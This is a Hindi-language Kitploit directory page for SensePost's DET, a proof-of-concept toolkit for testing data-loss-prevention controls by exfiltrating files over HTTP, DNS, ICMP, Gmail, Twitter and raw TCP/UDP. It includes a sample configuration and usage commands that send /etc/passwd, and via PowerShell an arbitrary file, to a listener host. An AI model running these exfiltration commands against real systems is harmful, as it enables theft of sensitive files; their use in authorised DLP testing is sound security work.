Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
DET — (विस्तारणीय) Data Exfiltration Toolkit (DET) | Kitploit
उपकरण/GitHubGitHub/sensepost/det
एन्क्रिप्शन/डिक्रिप्शन उपकरणडेटा निष्कासननेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगDNS विश्लेषण
GitHubsensepost/det

DET

(विस्तारणीय) Data Exfiltration Toolkit (DET)

रिपॉजिटरी देखें
821190508 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DET (विस्तारणीय) डेटा एक्सफिल्ट्रेशन टूलकिट

DET (जैसा है वैसा प्रदान किया जाता है), एक प्रूफ ऑफ कॉन्सेप्ट है जो एक साथ एकल या एकाधिक चैनल(चैनलों) का उपयोग करके डेटा एक्सफिल्ट्रेशन करने के लिए है।

यह एक प्रूफ ऑफ कॉन्सेप्ट है जिसका उद्देश्य संभावित DLP विफलताओं की पहचान करना है। इसका उपयोग संवेदनशील/लाइव डेटा (जैसे किसी मूल्यांकन पर) को एक्सफिल्ट्रेट करने के लिए कभी नहीं किया जाना चाहिए

विचार एक सामान्य टूलकिट बनाने का था जो किसी भी प्रकार के प्रोटोकॉल/सेवा को प्लग कर सके ताकि नेटवर्क मॉनिटरिंग और डेटा लीकेज प्रिवेंशन (DLP) समाधानों के कॉन्फ़िगरेशन का विभिन्न डेटा एक्सफिल्ट्रेशन तकनीकों के विरुद्ध परीक्षण किया जा सके।

प्राथमिक रिपॉजिटरी अब यहां स्थानांतरित हो गई है।

स्लाइड्स

DET को BSides Ljubljana में 9 मार्च 2016 को प्रस्तुत किया गया था और स्लाइड्स यहां उपलब्ध होंगी। स्लाइड्स यहां उपलब्ध हैं।

उदाहरण उपयोग (ICMP प्लगइन)

सर्वर-साइड:

asciicast

क्लाइंट-साइड:

asciicast

दो चैनलों (Gmail/Twitter) को संयोजित करने का उपयोग

सर्वर-साइड:

asciicast

क्लाइंट-साइड:

asciicast

इंस्टॉलेशन

रिपॉजिटरी को क्लोन करें:

root@kitploit:~
git clone https://github.com/sensepost/DET.git

फिर:

root@kitploit:~
pip install -r requirements.txt --user

कॉन्फ़िगरेशन

DET का उपयोग करने के लिए, आपको इसे कॉन्फ़िगर करना होगा और अपनी उचित सेटिंग्स (जैसे SMTP/IMAP, AES256 एन्क्रिप्शन पासफ्रेज़ आदि) जोड़नी होंगी। एक कॉन्फ़िगरेशन उदाहरण फ़ाइल प्रदान की गई है और इसका नाम है: config-sample.json

root@kitploit:~
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "[email protected]",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

उपयोग

सहायता उपयोग

root@kitploit:~
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

सर्वर-साइड:

प्रत्येक प्लगइन लोड करने के लिए:

root@kitploit:~
python det.py -L -c ./config.json

केवल twitter और gmail मॉड्यूल लोड करने के लिए:

root@kitploit:~
python det.py -L -c ./config.json -p twitter,gmail

सभी प्लगइन लोड करने और DNS को बाहर करने के लिए:

root@kitploit:~
python det.py -L -c ./config.json -e dns

क्लाइंट-साइड:

प्रत्येक प्लगइन लोड करने के लिए:

root@kitploit:~
python det.py -c ./config.json -f /etc/passwd

केवल twitter और gmail मॉड्यूल लोड करने के लिए:

root@kitploit:~
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

सभी प्लगइन लोड करने और DNS को बाहर करने के लिए:

root@kitploit:~
python det.py -c ./config.json -e dns -f /etc/passwd

और PowerShell (HTTP मॉड्यूल) में:

root@kitploit:~
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

मॉड्यूल

अब तक, DET कई प्रोटोकॉल का समर्थन करता है, जिन्हें यहां सूचीबद्ध किया गया है:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (जैसे Gmail)
  • Raw TCP
  • PowerShell कार्यान्वयन (HTTP, DNS, ICMP, SMTP (Gmail के साथ प्रयुक्त))

और अन्य "सेवाएँ":

  • Google Docs (अप्रमाणित)
  • Twitter (डायरेक्ट मैसेज)

प्रायोगिक मॉड्यूल

अब तक, मैं नए मॉड्यूल लागू करने में व्यस्त हूं जो लगभग शिप करने के लिए तैयार हैं, जिनमें शामिल हैं:

  • Skype (95% पूर्ण)
  • Tor (80% पूर्ण)
  • Github (30/40% पूर्ण)

रोडमैप

  • उचित एन्क्रिप्शन जोड़ें (जैसे AES-256) ryanohoro का धन्यवाद
  • संपीड़न (अत्यंत महत्वपूर्ण!) chokepoint का धन्यवाद
  • उचित डेटा अस्पष्टीकरण और Cloakify Toolset Toolset का एकीकरण
  • FTP, FlickR LSB स्टेग्नोग्राफ़ी और Youtube मॉड्यूल

संदर्भ

कुछ बहुत अच्छे संदर्भ/श्रेय उन लोगों को जिनसे मैंने उनके प्रोजेक्ट से प्रेरणा ली:

  • https://github.com/nullbind/Powershellery/ Nullbind द्वारा।
  • https://github.com/ytisf/PyExfil, वास्तव में बहुत बढ़िया।
  • https://github.com/m57/dnsteal m57 द्वारा।
  • https://github.com/3nc0d3r/NaishoDeNusumu 3nc0d3r द्वारा।
  • https://github.com/glennzw/exphil Glenn Wilkinson द्वारा।
  • Saif El-Sherei द्वारा WebExfile

संपर्क/योगदान

आप मुझसे ट्विटर पर @PaulWebSec पर संपर्क कर सकते हैं। यदि आप योगदान देना चाहते हैं, क्लोन करना, फोर्क करना, अपना PR सबमिट करना आदि, तो बेझिझक करें।

लाइसेंस

DET MIT लाइसेंस के तहत लाइसेंस प्राप्त है। इस लाइसेंस के दायरे से परे अनुमतियाँ [email protected] पर उपलब्ध हो सकती हैं।

टूल डाउनलोड करें